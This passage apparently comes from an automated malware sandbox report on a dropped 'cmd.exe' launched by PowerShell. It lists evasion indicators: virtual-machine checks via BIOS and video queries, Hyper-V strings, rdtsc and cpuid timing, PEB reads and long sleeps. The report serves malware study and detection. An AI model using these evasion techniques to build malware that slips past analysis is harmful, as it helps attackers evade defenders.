                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_02681E49 push dword ptr [esp+03h]; mov dword ptr [esp], ebp10_2_02681E4D
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0268360A push dword ptr [esp+24h]; retn 0028h10_2_026835AE
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_026826D2 push eax; ret 10_2_02682937
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0268076A push ebx; ret 10_2_0268076D
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_026807F2 push edx; retf 10_2_026807F3
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_026837C8 push dword ptr [esp+10h]; retn 0014h10_2_026837C4
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_02684FCA push es; ret 10_2_02684FCD
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_02682789 push dword ptr [esp+04h]; retn 0008h10_2_026827AD
                          Source: cmd.exe.0.drStatic PE information: section name: .itext entropy: 7.893088081152898
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\cmd.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\cmd.exeJump to dropped file

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 5001
                          Source: unknownNetwork traffic detected: HTTP traffic on port 5001 -> 49701
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 5001
                          Source: unknownNetwork traffic detected: HTTP traffic on port 5001 -> 49749
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Temp\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Source: C:\Windows\Temp\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Windows\Temp\cmd.exeSystem information queried: FirmwareTableInformationJump to behavior
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_02656A3C rdtsc 10_2_02656A3C
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7149Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2492Jump to behavior
                          Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 441Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7036Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6196Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\Temp\cmd.exe TID: 5464Thread sleep count: 71 > 30Jump to behavior
                          Source: C:\Windows\Temp\cmd.exe TID: 5464Thread sleep time: -35500s >= -30000sJump to behavior
                          Source: C:\Windows\Temp\cmd.exe TID: 2348Thread sleep time: -180000s >= -30000sJump to behavior
                          Source: C:\Windows\Temp\cmd.exe TID: 5404Thread sleep time: -30000s >= -30000sJump to behavior
                          Source: C:\Windows\Temp\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_02653ECD lstrcpyW,lstrcpyW,lstrcatW,FindFirstFileW,PathRemoveFileSpecW,lstrcatW,lstrcmpW,lstrcmpW,lstrcatW,CreateDirectoryW,lstrcatW,lstrcatW,lstrcatW,PathRemoveFileSpecW,PathRemoveFileSpecW,lstrcatW,PathRemoveFileSpecW,PathRemoveFileSpecW,lstrcatW,lstrcatW,CopyFileExW,lstrcpyW,lstrcatW,lstrcpyW,lstrcatW,FindNextFileW,FindClose,10_2_02653ECD
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: cmd.exe, 0000000A.00000002.2102253733.0000000000B86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWHH
                          Source: cmd.exe, 0000000A.00000003.2074794526.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2055953953.0000000000BC2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2089874877.0000000000BC2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2044239981.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000002.2102253733.0000000000BBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWUa|
                          Source: cmd.exe, 0000000A.00000003.2044239981.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2074794526.0000000000BC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: powershell.exe, 00000000.00000002.1415178433.0000000006E32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_02656A3C rdtsc 10_2_02656A3C
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_00445250 LdrInitializeThunk,10_2_00445250
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_02651257 mov edx, dword ptr fs:[00000030h]10_2_02651257
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_02652B0A mov edx, dword ptr fs:[00000030h]10_2_02652B0A
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0265398E mov eax, dword ptr fs:[00000030h]10_2_0265398E
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0265664A mov edx, dword ptr fs:[00000030h]10_2_0265664A
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_02652750 mov ebx, dword ptr fs:[00000030h]10_2_02652750
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_02660D40 mov eax, dword ptr fs:[00000030h]10_2_02660D40
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_02660D2F mov eax, dword ptr fs:[00000030h]10_2_02660D2F
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Temp\cmd.exe "C:\Windows\Temp\cmd.exe" Jump to behavior
                          Source: cmd.exe, 0000000A.00000000.1382205168.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, cmd.exe, 0000000A.00000003.1900062154.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, cmd.exe.0.drBinary or memory string: Shell_TrayWndS
                          Source: cmd.exe, 0000000A.00000000.1382205168.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, cmd.exe, 0000000A.00000003.1900062154.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, cmd.exe.0.drBinary or memory string: Shell_TrayWndReBarWindow32MSTaskSwWClassToolbarWindow32SV
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_02652031 cpuid 10_2_02652031
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
